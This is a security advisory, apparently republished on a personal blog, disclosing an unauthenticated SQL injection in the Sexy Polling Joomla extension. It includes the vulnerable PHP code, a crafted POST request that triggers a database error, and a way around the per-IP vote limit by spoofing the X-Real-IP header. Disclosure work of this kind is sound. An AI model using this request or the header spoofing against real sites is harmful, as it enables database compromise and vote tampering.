FUN WITH LINUX

SexyPolling SQL Injection

18 April 2022

Identifier: AIT-SA-20220208-01
Target: Sexy Polling ( Joomla Extension)
Vendor: 2glux
Version: all versions below version 2.1.8
CVE: Not yet
Accessibility: Remote
Severity: Critical
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

Summary

Sexy Polling is a Joomla Extension for votes.. In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.

Vulnerability Description

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.

In lines 74 and 75 in the site/vote.php code, the parameters are assigned without being checked:

$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';

These are later used unfiltered by the WHERE clause:

$query_toal = "SELECT

COUNT(sv.`id_answer`) total_count,

MAX(sv.`date`) max_date,

MIN(sv.`date`) min_date

FROM

`#__sexy_votes` sv

JOIN

`#__sexy_answers` sa ON sa.id_poll = '$polling_id'

AND

sa.published = '1'

WHERE

sv.`id_answer` = sa.id";

 

//if dates are sent, add them to query

if ($min_date_sended != '' && $max_date_sended != '')

$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";

Proof Of Concept

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.

HTTP-Request:

POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

HTTP_X_REAL_IP: 1.1.1.1

Content-Length: 193

Origin: joomla-server.local

Connection: close

Referer: joomla-server.local/index.php/component/search/

Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

 

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1

The HTTP-Resoonse contains a mysql error:

HTTP/1.1 500 Internal Server Error

Date: Wed, 15 Dec 2021 10:27:40 GMT

Server: Apache/2.4.41 (Ubuntu)

Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-cache

Pragma: no-cache

Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/

Content-Length: 4768

Connection: close

Content-Type: application/json

 

<!DOCTYPE html>

<html lang="en-gb" dir="ltr">

<head>

<meta charset="utf-8" />

<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#039;00:00:00&#039; AND sv.`date` &lt;= &#039;2021-12-14 23:59:59&#039;&#039; at line 12</title>

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />

Bypassing limits

Sexy polling limits votes to one vote per IP-address. This is also done in the source file site/vote.php :

//get ip address

$REMOTE_ADDR = null;

if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { list($REMOTE_ADDR) = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); }

elseif(isset($_SERVER['HTTP_X_REAL_IP'])) { $REMOTE_ADDR = $_SERVER['HTTP_X_REAL_IP']; }

elseif(isset($_SERVER['REMOTE_ADDR'])) { $REMOTE_ADDR = $_SERVER['REMOTE_ADDR']; }

else { $REMOTE_ADDR = 'Unknown'; }

$ip = $REMOTE_ADDR;

We can bypass this limitation by changing the header „ HTTP_X_REAL_IP“ for every single request.

Vulnerable Versions

All versions below version 2.1.8

Tested Versions

Sexy Polling ( Joomla Extension) 2.1.7

Impact

An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation

Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline

2021-12-14 Unable to find a contact of the vendor
2021-12-15 Contacting Joomla Security Strike Team
2021-12-29 Answer from the Joomla Security Strike Team that they will investigate the problem.
2022-01-01 Sexy Polling releases 2.1.8
2022-04-08 Public Disclosure

We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.

Advisory URL

https://www.ait.ac.at/ait-sa-20220208-01-sexypolling

[ PHP  Programming  Web  Security  CVE  ]
Except where otherwise noted, content on this site is licensed under a Creative Commons Attribution 3.0 Unported License.

Copyright 2015-present Hoti